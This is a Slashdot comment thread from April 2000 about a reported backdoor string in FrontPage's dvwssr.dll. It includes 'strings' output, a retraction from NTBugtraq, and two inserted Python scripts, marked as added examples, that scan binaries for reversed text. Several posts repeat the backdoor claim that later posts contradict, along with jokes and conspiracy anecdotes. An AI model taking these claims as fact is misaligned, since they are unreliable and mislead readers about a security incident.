    You can't be absolutely complacent, unless you both compile everything on your system from source and review all the source code before compiling. Even then you can't really be sure without dumping the object code (remember the old Unix password hack built into the C compiler?).

    If you consider most root exploits such as the one that came out in bind last year, most of them are bugs. It wouldn't be too hard to deliberately introduce such bugs so they would pass casual inspection. Another proof that whoever did this was an idiot.

    Open source's advantages over closed source for security are relative, not absolute. As in bug fixes, things can be discovered faster and fixed faster.

    --
    Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
  361. Just found another story... by Gompers · · Score: 3
  362. Odd? by cdlu · · Score: 3

    Doesn't it strike you as odd that removing a file is a bugfix?

    Questions arise: 1) Why was it there? 2) What will removing it break? and 3) What the heck kind of bugfix is deleting a file in the first place?

    "My kernel is panicking on boot!" "Delete /vmlinuz, it'll work after that."

    I will never fully understand Microsoft Corp., its methods, or its software.

    Microsoft: bringing you yesterday's technology tomorrow.

  363. Could this "discovery" be deliberate? by addison · · Score: 3

    Hrm.

    According to the stories, Frontpage 2000 on Windows 2000 isn't affected.

    As The Register puts it, per the link above:

    The problem isn't there in Win2k servers with FrontPage 2000 extensions, so an upgrade might be a good idea. But not necessarily to Win2k.

    Hrm.

    Ok, Windows 2000 isn't jumping off the shelves. Problems are grounding it. So... maybe it's time to "leak" an old backdoor, so that people would upgrade to 2000 ASAP?

    Granted, those who thought would be saying "What problems will we have there" - but by and large - the people who think aren't running NT (especially for webserving).

    (Not an NT bash, BTW. I'm talking about the vast majority of tossed-up NT servers who fill needs, and then massive effort is spent _fixing_ problems, performance, etc, rather than sitting down, building a good solution, and doing it right. (Personal opinion, NT shouldn't be there, but in those cases, some valid cases can be made for NT).

    I just... Surely not. Surely this is just a coincidence. But... I've *got* to wonder..

    Addison

  364. Uh ... by truefluke · · Score: 3

    *If* this is true, this is supposed to be representative of a responsible and respected company? And why only one thin report on something so serious? IF this is true, I still don't understand how Microsoft thinks they have any business releasing software with Internet functionality anymore. Intranet, sure. Internet? No way.

    --
    spam, spam, spam, spam, e-mail, news and spam.
  365. Not MS policy by spiralx · · Score: 3

    Okay, this is a truly bad hole in Microsoft's server software, and one which should never have been there in the first place. And while many people here may scream conspiracy, I don't think that it was. Rather I think this was a case of coders doing something without the knowledge of the designers / policy makers or whatever.

    Think about it. Why would Microsoft want this put into their software, when if it was found out, which would be likely, would lead to a massive publicity scandal, and possible legal action? This wouldn't be in their best interests at all, especially given the current events.

    Rather, this sounds like the sort of thing coders would do, especially the part about Netscape employees being "weenies". Given that MS employees are loyal to MS, this kind of thing sounds like something they would choose on their own, just because they thought no-one would notice it.

    1. Re:Not MS policy by Black+Parrot · · Score: 5

      > Rather I think this was a case of coders doing something without the knowledge of the designers / policy makers or whatever.

      Perhaps so. But does that make MS look better, or worse?

      The MS web documentation (see link in my top-level post) indicates that this file is the "gateway" that decides what incoming HTTP connects are allowed to look at. If a rogue programmer can slip a backdoor into a security module, what else is going on in other parts of the system?

      With this landing in the middle of the investigations/accusations of spyware that are now going on in France, the EU, and elsewhere, I suspect that history will refer to this as the Easter Revelation that killed closed source software.

      To a French diplomat, it does not matter whether a backdoor was planted by the NSA, Microsoft, or a rogue employee. What matters is whether there are any backdoors in his software at all.

      --
      Sheesh, evil *and* a jerk. -- Jade
  366. spectacular by Kmon · · Score: 3

    Thrilling. I love it. The greatest thing is that I'm sitting here with dvwssr.dll open in a text editor. The password is stored in cleartext. Backwards, yes, it took me a full thirty seconds to find it. Oh yes here it is:

    !seineew era sreenigne epacsteN

    You think they could've, I dunno, ENCRYPTED IT? I mean, it's one thing (unscrupulous as it is) to put a backdoor in software, but it's just plain stupid to store the p/w in cleartext on every machine that runs frontpage in the world.

    --
    Gah
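
The check described in the comment above, as an added example that is not part of the original post and not Microsoft code: a strings-style scan that also reads every printable run backwards, which is why storing a phrase reversed hides nothing from anyone auditing a binary. The byte blob, the wordlist and the function names are constructed for illustration; only the reversed phrase is taken from the comment.

```python
import re

# Constructed sample: binary padding and two ordinary names around the reversed
# phrase quoted in the comment. This is NOT the contents of the real DLL.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"GetProcAddress\x00"
    b"!seineew era sreenigne epacsteN\x00"
    b"\xff\xfe\x01\x02kernel32.dll\x00\x8b\xec"
)

# Tiny illustrative wordlist; a real audit would load a full dictionary file.
WORDS = {"are", "engineers", "netscape", "weenies",
         "password", "secret", "key", "admin"}


def printable_runs(blob, min_len=6):
    """Yield (offset, text) for each run of printable ASCII, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(blob):
        yield match.start(), match.group().decode("ascii")


def word_hits(text):
    """Count alphabetic tokens in text that appear in the wordlist."""
    return sum(1 for tok in re.findall(r"[a-z]+", text.lower()) if tok in WORDS)


def find_reversed_text(blob, min_hits=2):
    """Return (offset, stored, readable) for runs that only make sense reversed."""
    findings = []
    for offset, stored in printable_runs(blob):
        forward = word_hits(stored)
        backward = word_hits(stored[::-1])
        # Flag a run when reversing it produces dictionary words that the
        # stored form does not: reversal is the only "protection" applied.
        if backward >= min_hits and backward > forward:
            findings.append((offset, stored, stored[::-1]))
    return findings


if __name__ == "__main__":
    for offset, stored, readable in find_reversed_text(SAMPLE_BLOB):
        print(f"offset 0x{offset:04x}: {stored!r} -> {readable!r}")
```
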
  367. Re:If it were open source ... by MonkeyMagic · · Score: 3

    ...it would never have been there in the first place. Most of us would be embarrassed to open up such obvious flaws in our code - peer review would never have let this happen.

  368. First time for nothing. by ssooyy · · Score: 3

    Oh yeah, like this hasn't happened before. I hear that Microsoft has a deal with the CIA to install remote servers on all computers. So now the CIA can steal our porno!

    --
    - soy
    1. Re:First time for nothing. by Kmon · · Score: 4

      Oh yeah, like this hasn't happened before. I hear that Microsoft has a deal with the CIA to install remote servers on all computers. So now the CIA can steal our porno!

      No way, we'd catch on once we see a Linux box with a blue screen!

      --
      Gah
  369. Re:Affects "almost every Web-hosting provider." by gilroy · · Score: 3
    Quoth the poster:
    So M$'s bug affects Apache then? ;-P
    Is it any surprise that the official mouthpiece for corporatism thinks that Microsoft runs "almost all" Web servers? The whole FSOS (Free Software / Open Source) movement almost necessarily falls below the radar of corporatists. If it doesn't cost anything, and it can't be charged as a loss-leader, then it must not be important.

    It is, in fact, this blindness that makes corporatism (a) so evil and (b) so futile in the long run. There are values that are not economic values, and they do have the strength to compete.

  370. If it were open source ... by Dhericean · · Score: 3

    we could all see what the password is.

    --

    Gamma Testing - Where testing is extended to the full user community (AKA Shipping the Program)
  371. Can we get a backdoor for Apache? by lbrlove · · Score: 3

    I propose a new backdoor in the Apache code. It would work something like this:

    When the user types "Bill Gates is a fungus covering the streets of the cyber village" to a logged site, the server immediately spawns new processes which scour the Web looking for vulnerable IIS servers.

    Upon finding these sites, it does nothing. Why would you need to do anything to a machine that runs (Af)front Page Extensions?! It already suffers from enough code-bloat to make any amount of bandwidth nearly useless.

    -L

  372. Actual report - not as bad as it looked by davew · · Score: 4

    Russ Cooper just posted a more educated summary of the problem to NTBUGTRAQ. It's in the archives at this location.

    It's NOT as bad as first reported. Russ says that his comment that it affects "almost every web hosting provider" was based on the info that it was some sort of Front Page issue. It's not that simple, and it seems that it's only exploitable by users who have already been granted web authoring permissions on the box.

    Have fun,
    Dave


  373. Russ Cooper says "NO VULNERABILITY" by IntlHarvester · · Score: 4

    Here's hoping this is high enough on the page that people see it. The /. story should probably be updated.

    From: Windows NTBugtraq Mailing List [NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]
    on behalf of Russ [Russ.Cooper@RC.ON.CA]
    Sent: Friday, April 14, 2000 12:33 PM
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    Subject: Re: DVWSSR.dll Vulnerability in Microsoft IIS 4.0 Web Servers

    Ok, here's a breaking update.

    Latest reports say that there is

    NO VULNERABILITY IN DVWSSR.DLL

    Yup, that's right, different again from what I said earlier, and even more
    different than what I said yesterday to WSJ.

    Please accept that I have followed the story published elsewhere and tried
    to keep you abreast of everything I knew. Also appreciate that the amount of
    time given to verify and research the claims made by others has been
    extremely short. I've had probably 30 interviews today by orgs pressing for
    information on the story as the feeding frenzy occurs after the first one
    goes to press (WSJ in this case).

    MS have had people working on this thing like madmen, trying to verify the
    claims and investigate all of the possible pieces of code that may be
    affected. As that research progressed, different observations were made and
    so the story came out in various stages (with varying levels of
    "correctness"). Had they been given a reasonable amount of time to respond,
    nobody would have been in a tizzy about anything (i.e. the press would not
    have cared to run this story anywhere).

    Decide for yourself whether we were better served by (more) immediate
    disclosure or not. I've stood where I stand for a reason, despite the
    loathing of others for my stance...

    In the end, it turns out that unless you actually have permissions for the
    file you are requesting, you'll get an error message when you follow the
    procedures outlined by RFP in his RFP2K02 advisory.

    That said, understand that sites that allow connections by Front Page may
    very well provide you with source asp if you request it. BUT THAT WILL
    HAPPEN with or without the .dll. Without proper and full permissions applied
    across virtual servers on a given box, site leakage or manipulation by
    others will always be possible in myriad ways.

    From what I've heard/seen/been told, permissions on the test servers must
    have either been non-existent, incorrectly applied, or permissioned the user
    across multiple virtual sites (i.e. incorrectly applied).

    I had someone claim that they could get into an FP98 site using
    "Netscapeengineersareweenies!" as a userID and no password...making them
    think it was a backdoor userID. Fact is they could get into the same sites
    using "TomDickandHarry" as a userID too. If the permissions aren't set
    correctly, anything is possible.

    This info may change again before it's finalized. It may well be that there
    is some way to use this .dll in a way that's not intended...it just doesn't
    appear to be this one. On a box where multiple sites have not been
    individually permissioned, or permissions are lax or non-existent...anyone
    permissioned to execute the .dll in the first place would have the ability
    to simply open the other sites and manipulate them directly (i.e. no need to
    do this junk with the dvwssr.dll)

    Finally, to my point out the string not being a password. Elias Levy of
    SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly
    pointed out that using the term password to apply to that string is not
    beyond the realm of understanding. The client component mtd2lv.dll and the
    server component dvwssr.dll both need to know this value, and use it
    correctly, for communications to work. If you try and talk directly to
    dvwssr.dll and don't obfuscate your communication with the correct "key", it
    won't understand you. Of course if you don't already have permissions,
    knowing this value gets you nothing...hence my observation that it's not a
    password. Whatever it is, it appears to be meaningless junk text used as
    data.

    Cheers,
    Russ - NTBugtraq Editor
    "dot-age" (as in "we're in the dot-age") = senility (source Webster's)

    --
    Business. Numbers. Money. People. Computer World.
  374. Here's the dealio. by Zico · · Score: 4

    Microsoft has a Security Bulletin and a FAQ about the problem. Although it's limited, there is a vulnerability -- nothing like those password scenarios that have been bandied about, however.

    Quick summary: If multiple web sites are hosted on a NT4/IIS4 server with FrontPage 98 extensions installed, then webmaster A with web authoring permissions on his own site could potentially inappropriately read the .asp (and possibly the global.asa, but no others) files of webmaster B's web site if he knew where they existed on the same server. Note that to be able to do this, user B would have had to have granted user A read permissions (explicitly, or by giving read access to "Everyone") on those files -- otherwise, user A would be unable to read the files.

    Soooo, this looks like a tremendously smaller problem than everyone originally thought, although there definitely is a vulnerability for the scenario I mentioned above. Corrections welcomed if I munged any of that explanation.

    Cheers,
    ZicoKnows@hotmail.com

  375. Looks like there never was a backdoor (read below) by Zico · · Score: 4

    This was posted to the NTbugtraq list by Russ, the owner. If true, there are a whole damn lot of Slashdotters who made fools of themselves jumping to conclusions today. That's all I'll say about that, so, on with the post (sorry for the bold, and the entire repost, but it needs to be seen):

    ======= BEGIN MESSAGE =========

    Ok, here's a breaking update.

    Latest reports say that there is

    NO VULNERABILITY IN DVWSSR.DLL

    Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ.

    Please accept that I have followed the story published elsewhere and tried to keep you abreast of everything I knew. Also appreciate that the amount of time given to verify and research the claims made by others has been extremely short. I've had probably 30 interviews today by orgs pressing for information on the story as the feeding frenzy occurs after the first one goes to press (WSJ in this case).

    MS have had people working on this thing like madmen, trying to verify the claims and investigate all of the possible pieces of code that may be affected. As that research progressed, different observations were made and so the story came out in various stages (with varying levels of "correctness"). Had they been given a reasonable amount of time to respond, nobody would have been in a tizzy about anything (i.e. the press would not have cared to run this story anywhere).

    Decide for yourself whether we were better served by (more) immediate disclosure or not. I've stood where I stand for a reason, despite the loathing of others for my stance...

    In the end, it turns out that unless you actually have permissions for the file you are requesting, you'll get an error message when you follow the procedures outlined by RFP in his RFP2K02 advisory.

    That said, understand that sites that allow connections by Front Page may very well provide you with source asp if you request it. BUT THAT WILL HAPPEN with or without the .dll. Without proper and full permissions applied across virtual servers on a given box, site leakage or manipulation by others will always be possible in myriad ways.

    From what I've heard/seen/been told, permissions on the test servers must have either been non-existent, incorrectly applied, or permissioned the user across multiple virtual sites (i.e. incorrectly applied).

    I had someone claim that they could get into an FP98 site using "Netscapeengineersareweenies!" as a userID and no password...making them think it was a backdoor userID. Fact is they could get into the same sites using "TomDickandHarry" as a userID too. If the permissions aren't set correctly, anything is possible.

    This info may change again before it's finalized. It may well be that there is some way to use this .dll in a way that's not intended...it just doesn't appear to be this one. On a box where multiple sites have not been individually permissioned, or permissions are lax or non-existent...anyone permissioned to execute the .dll in the first place would have the ability to simply open the other sites and manipulate them directly (i.e. no need to do this junk with the dvwssr.dll)

    Finally, to my point out the string not being a password. Elias Levy of SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly pointed out that using the term password to apply to that string is not beyond the realm of understanding. The client component mtd2lv.dll and the server component dvwssr.dll both need to know this value, and use it correctly, for communications to work. If you try and talk directly to dvwssr.dll and don't obfuscate your communication with the correct "key", it won't understand you. Of course if you don't already have permissions, knowing this value gets you nothing...hence my observation that it's not a password. Whatever it is, it appears to be meaningless junk text used as data.

    ===== END MESSAGE ======

    Cheers,
    ZicoKnows@hotmail.com

  376. Re:haha.. by stx23 · · Score: 4
    And from the properties dialog:-
    Microsoft Design Tool - Link View
    It's installed by Front Page Server Extensions 3.0. 'The FrontPage Extensions manage design-time Web permissions using the underlying security model of the host operating system on the server.'
    From MSDN
    A request to fetch the source code for an ASP file without processing, for example, to view the links in that file, is handled by that Web's dvwssr.dll.

    Presumably the magic phrase can override permissions to expose the source code. It's ::$DATA all over again.
  377. actually... by griffjon · · Score: 4

    well, what you say actually could be enforced under the DMCA. I'll wager that the FP EULA doesn't allow users to decompile or strings it.

    And really, it wasn't JUST encrypted backwards, it had a full double-ROT13 encryption applied before that, so even after de-backwardsing it, you still would have to take it through two rounds of ROT13 before it was readable.

    --
    Returned Peace Corps IT Volunteer
    1. Re:actually... by Sloppy · · Score: 4

      Two rounds of ROT13 is still incredibly weak, though. All the crypto experts recommend at least 16 rounds, and with processors being so fast these days, I usually do 64 rounds.


      ---
      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  378. Two Points... by Evro · · Score: 4
    Without having read all these comments, I apologize if these points are redundant. However...
    • With UCITA in effect, wouldn't MS be completely within its right by putting backdoors in its software? And wouldn't MS be able to sue the WSJ reporters for exposing this flaw?
    • Right here we can see why MS will never open their source code. Perhaps they even put this backdoor in on purpose so that they could say to the Justice Department, "Look, if you open the source code up, all these bugs/backdoors will be exposed, and every site running Win2k will be destroyed. So you can't open the source, for the good of the Web." Far-fetched perhaps, but it seems like the kind of tactic they might use.

    I think this discovery may have much farther-reaching implications than anybody presently realizes.

    __________________________________________________ ___

    --
    rooooar
  379. Thus proving... by Black+Parrot · · Score: 4

    Thus proving that the closed source model is, in fact, more secure than the open source model?

    --
    Sheesh, evil *and* a jerk. -- Jade
  380. Re:So what does the file do then? by Black+Parrot · · Score: 4
    I'm not finding much info. Google only has a couple of useful hits, and they turn out to be essentially the same. Check out the MS reference page and read the section entitled "Web Application Level". (Read it carefully, because the bit about changing ACLs is apparently not the function of the .dll in question.)

    dvwssr.dll is described as a "gatekeeper" for browsing, which would make sense if it is where the backdoor code lies. It is apparently part of the "FrontPage Server Extensions". The table at the link gives the .dll's location for systems running NT with NTFS, so that's all I can deduce about who's exposed.

    Oh, and I can't resist this quote from the linked page:
    Security for Web applications is a complicated subject because it can be set at several levels in several different ways.
    One more level and one more way than it was supposed to, eh?

    --
    Sheesh, evil *and* a jerk. -- Jade
  381. (OT) how were DES S boxes picked? by Tau+Zero · · Score: 4
    They might have been classified at first, but the reasons have been rediscovered independently. What were rediscovered independently? I'm glad you asked me that. After the discovery of differential cryptanalysis by academic cryptographers, an investigation of DES found that the S boxes were highly resistant to this technique. The original IBM scheme, using 64-bit keys, would have also allowed many weak keys to be used. The S boxes were designed by the NSA, proving that the NSA's cryptographers knew of differential cryptanalysis and how to make cyphers resistant to it years before the technique was discovered by people working in the public sphere.

    "Not cracked yet" happens to be the acid test for cryptosystems. Anything which has been open to public scrutiny and attack for years without being cracked is more trustworthy than something which has not. DES is losing usefulness because hardware is now fast enough to do brute-force attacks at reasonable cost, but that's something we knew would happen. If you have secrets you need to protect for the ages, you don't use DES anyway. The traditional way of protecting these things is to use bullets, though the US government is a little bit more sophisticated; to protect some secrets known by a dying CIA director, he was scheduled for neurosurgery which destroyed his speech centers before his scheduled Congressional subcommittee appearance. Not exactly subtle, but clever.

    (Is there anyone who doesn't shiver when they think of the stuff like this that spooks do?)
    --
    Time is Nature's way of keeping everything from happening at once... the bitch.
  382. Heaven's Gift? by wouter · · Score: 4

    This seems as a heaven's gift to me for all those "security through obscurity doesn't work" advocates. We know they're right, but this event - if it is entirely true, and gets headlined in many media - would certainly help management understand that something might be wrong with their perception of how to handle security.

    Surely, this event won't mean that suddenly every company will switch to an open source solution, but I firmly believe that this event is one of the many steps that happen in the evolution of perception of software and its uses.

    This won't result in a sudden increase in the usage of Linux, FreeBSD or any other open source solution... It's just all matter of evolution...

    ... If it is solid... I mean, this sounds too good to be true, not?

    Anyway, I'm on my way telling my manager "told you so!" :)

  383. So what does the file do then? by Raindeer · · Score: 4

    If you can delete the file dvwssr.dll this easily, without any repercussions, I wonder what it did there in the first place.

    1. Re:So what does the file do then? by Guru+Meditation · · Score: 5

      The .dll in question is part of the Frontpage extensions:

      The FrontPage Extensions manage design-time web permissions using the underlying security model of the host operating system on the server. Here we consider only the case where this operating system is Windows NT 4.0 with the NTFS file system.
      FP manages administer and author access to a web using the same technique. In the web's root directory, FP creates a directory named _vti_bin. Within this directory it creates two sub-directories, _vti_adm and _vti_aut. Within _vti_adm FP places a file, admin.dll, and within _vti_aut it places two files, author.dll and dvwssr.dll. These DLLs are ISAPI extensions. During design-time, client requests arrive over HTTP at the server and are routed to one of these ISAPI DLLs.
      A request to perform an administrative function, for example, change permissions on a web, is handled by that web's admin.dll.
      A request to perform an authoring function, for example, open a web, is handled by that web's author.dll.
      A request to fetch the source code for an ASP file without processing, for example, to view the links in that file, is handled by that web's dvwssr.dll.
      In the request, the client provides credentials that identify the user who is logged in to the client workstation. This user must have read permission (equivalent to read and execute individual permissions) for the DLL handling the request, otherwise the request is denied. Thus FP restricts who may perform a given request by controlling read permission on the directories in _vti_bin. Whenever a change is made to a web's permissions via the Web Permissions dialog box, the FP Extensions on the server modify the ACLs on the directories _vti_adm and _vti_aut in that web's _vti_bin directory accordingly. Note: FP does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories which contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FP manipulates content file ACLs to manage run-time security.
      --
      'We have no choice in what we are. Yet what are we,
      but the sum of our choices.' --Rob Grant
  384. Well done by heikkile · · Score: 4
    That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!), thus playing right into the hands of the open-source-is-good-for-security argument, and no-one at MS noticed it... the mind boggles.

    Here's my theory: Not everyone at MS is happy working there, and some may even be friendly to Open Source. Instead of (or just before) leaving the Evil Empire they decide to leave a small present. Once safely out, they tip off a journalist in one of the papers that can hurt MS the most.

    If nothing else, this shows a clear hole in MS quality control procedures. If these sorts of feelings are common inside MS, they may well be running into more serious problems than anything DOJ can give them...

    --

    In Murphy We Turst

  385. Re:I know the phrase... by Anonymous Coward · · Score: 5
    Actually, at offset 0xe00 in dvwssr.dll you will find something like "Netscape engineers are weenies!" in reverse. And also the filename "/global.asa" which I have no idea what it means since I don't use windows. (I found dvwssr.dll using ftpsearch, just to take a look at it.)

    /AC

  386. Risk, Accountability, and Interstate Commerce by Effugas · · Score: 5

    You know, it's funny. BugTraq recently posted news of a covert backdoor (obfuscated code, etc.) embedded in some minor commercial CGI out there. I considered posting it to Slashdot, but since one of the core magnifiers of a security breach is its universality (and I really didn't think that many people were using the script), I didn't think it'd get through the submission queue.

    Looks like Microsoft solved *that* problem for me, eh?

    They'll try to spin it, but there's really no good way to announce that there's a mission critical backdoor distributed in what appears to be an otherwise useless file. Assume the normal best case scenario: Some temp checked in the code on a lark.

    So, that basically means some temp that checks in code on a lark can insert a mission critical security hole that will affect hundreds of thousands of businesses and millions of consumers.

    Move up the chain. If it was a low grade employee who did it...if it was a small group of humorists angry about their easter egg being quelled...if Bill Gates himself did it and only he knew...worst case scenario, if Microsoft itself has no idea where this came from, but it got there...

    Then anyone sufficiently powerful can insert a globally available backdoor.

    The only defense? Microsoft was merely building in functionality allowing it to exercise its rights under UCITA to deny service to EULA violating customers (like websites that provide benchmarking statistics!).

    Now, I'm no Congressman, but when a company in Washington State is backing state bills that let it shut down a company in New York State, that sure sounds to me like a rather inappropriate regulation of Interstate Commerce. Say what you will about the abuse of federal powers vs. state rights; UCITA's one scheme that would have been used to hold Microsoft's portion of the Internet Economy hostage to a humorously named but cryptographically bare passphrase that any 14 year old with half a brain could find.

    If they've got a right to shut down software remotely, they've got a right to put in the backdoor that does it. That's how they were planning to get out of this disaster, which I'm sure they've known about for quite some time.

    We need federal protection against those who would sell us malicious code by pushing corrupt state laws through the legislatures. UCITA was born when it failed to pass congressional muster; it failed to pass for a very good reason. In an age when the Interstate Commerce clause has been abused to no end, millions of Americans must now worry about billions of dollars of their money being stolen by anyone running a Microsoft server. The company will put on a valiant show, but while one face is talking customer protection, the other is lobbying as hard as it can to eliminate any rights customers might have against such attacks.

    Microsoft is no longer invincible; fighting its legislative agenda is no death sentence. This intentionally released security hole clearly illustrates just what kinds of dangers UCITA opens up to the American consumer, for beyond even the simple analysis that Microsoft could claim this to be their legally protected implementation of a granted right...UCITA also bolsters Microsoft's right to sue whoever even looks for such a security hole, on the basis of a signed away right to reverse engineer.

    You can't find the bugs. You can't demand the bugs be removed. You can't even tell anyone about the bugs. If this isn't a restriction of Interstate Commerce--among several other well cherished rights--I don't know what is.

    Yours Truly,

    Dan Kaminsky
    DoxPara Research
    http://www.doxpara.com

  387. haha.. by FORTYoz · · Score: 5

    david@cold:~ > strings dvwssr.dll
    ... bunch of crap..
    /global.asa
    .asp
    !seineew era sreenigne epacsteN
    HTTP/1.0 404 Object Not Found
    .. more crap ..

    see the hidden message? hint.. it's backwards.
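
The check described in comments 385 and 387, combined with the `_vti_bin/_vti_aut/dvwssr.dll` location given in the documentation quoted in comment 383.1, as an added example that is not part of any original post. The watch-list `WORDS`, the function names and the byte string `SAMPLE` are constructed for illustration; `SAMPLE` is not the real DLL.

```python
import os
import re

# Layout from the FrontPage documentation quoted in the thread:
#   <web root>/_vti_bin/_vti_aut/dvwssr.dll
GATEKEEPER = os.path.join("_vti_bin", "_vti_aut", "dvwssr.dll")
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # same minimum length as strings(1)

def printable_runs(data):
    """Yield (offset, text) for each run of 4+ printable ASCII bytes."""
    for m in PRINTABLE.finditer(data):
        yield m.start(), m.group().decode("ascii")

def reversed_hits(data, words):
    """Return (offset, as_stored, reversed) for runs that contain a watched
    word only when read backwards (case-insensitive)."""
    hits = []
    for off, text in printable_runs(data):
        back = text[::-1]
        fwd_l, back_l = text.lower(), back.lower()
        if any(w in back_l and w not in fwd_l for w in words):
            hits.append((off, text, back))
    return hits

def audit_webs(root, words):
    """Walk `root`, find each web's dvwssr.dll, scan it for reversed text."""
    report = {}
    for dirpath, _dirs, _files in os.walk(root):
        path = os.path.join(dirpath, GATEKEEPER)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                report[path] = reversed_hits(fh.read(), words)
    return report

# Constructed sample: zero padding so the text starts at offset 0xe00,
# followed by the strings quoted in the thread.
SAMPLE = (b"\x00" * 0xE00 + b"!seineew era sreenigne epacsteN\x00"
          + b"/global.asa\x00.asp\x00HTTP/1.0 404 Object Not Found\x00")
WORDS = ["netscape", "engineers"]  # assumed watch-list for this example

if __name__ == "__main__":
    for off, stored, back in reversed_hits(SAMPLE, WORDS):
        print(f"0x{off:x}: {stored!r} -> {back!r}")
```

Point `audit_webs` at a content root to list every copy of the file together with any reversed text it carries.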

  388. Re:Windows 98 by Orlando · · Score: 5

    "Apparently if you play the Windows NT CD backwards you hear satanic messages"
    "You think that's bad, if you play it forwards it installs Windows NT!"

    orlando...

    --
    -= This is a self-referential sig =-
  389. Affects "almost every Web-hosting provider." by nhowie · · Score: 5

    So M$'s bug affects Apache then? ;-P

  390. ESR is wrong?? by EasyTarget · · Score: 5

    Eric S. Raymond said just this week that the open source model has one strength that closed source truly lacks, and can never have - peer review. All other "professional" endeavours of this magnitude have it (civil engineering was his example) and those professions are all the better for it.

    Closed source development where quality is a focus does have quite a lot of review, by peers, and others. And the whole process (architecture, design, code and test) is fully reviewed in a structured method that ensures that everything is covered, not just the 'gee whiz' bits.

    HOWEVER, this is not how Micro$oft and most other 'software houses' work.. It is used by places that truly care about software quality (NASA for instance). I used to work for Motorola developing for safety-critical systems, and peer review was very strong. I was a sysadmin and I was subject to review!

    Check out the CMM (Capability Maturity Model) from the SEI. Compare it with the list of things that most of us consider open source strengths, you might be surprised. If done right, it allows bug free (and I do mean free, as in no significant bugs at all!) development.

    Just because the likes of Micro$oft cannot be bothered to use this stuff, does not mean that closed source can -never- deliver quality or security. It just costs more.


    EZ
    -'Press Ctrl + Alt + Delete to log on..'

    --
    "Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
  391. Windows 98 by vbrtrmn · · Score: 5

    I heard that if you install Windows 98 backwards, it works.

    --
    it's a sig, wtf?
  392. Ye gods. by Bob+Ince · · Score: 5
    we don't know yet exactly which software is affected: IIS, FrontPage, or both.

    The CBS article makes this clearer: it is the IIS FrontPage extensions.

    I'm really, really having trouble believing this.

    That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!), thus playing right into the hands of the open-source-is-good-for-security argument, and no-one at MS noticed it... the mind boggles.

    There's nothing up on microsoft.com about it yet either, which also strikes me as strange. Is this really true? If so, it must be the security howler of the year.

    I personally can't check if it works as a backdoor, since on the NT web server here I deliberately de-installed all the crap IIS wants you to have (unnecessary script mappings, example sites, web admin, FrontPage extensions...). Contrary to what some sysadmins seem to think, security does not lie in keeping all the Microsoft default settings.

    Jesus wept. Prepare for a lot of defaced web sites.


    --
    This comment was brought to you by And Clover.
  393. Put down the mouse and step away from the keyboard by Anomalous+Canard · · Score: 5

    That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!),

    The plaintext is encrypted by writing it backwards in the .dll. By decrypting this copyrighted text, you have violated Section 1201 of the DMCA. Come along quietly and no one will get hurt.

    Anomalous: inconsistent with or deviating from what is usual, normal, or expected

    --
    Anomalous: deviating from what is usual, normal, or expected
    Canard: a false or unfounded repor
  394. Here's the offending dll by cheekymonkey_68 · · Score: 5

    Here's a link to the file dvwssr.dll for those who still think it's a belated April Fool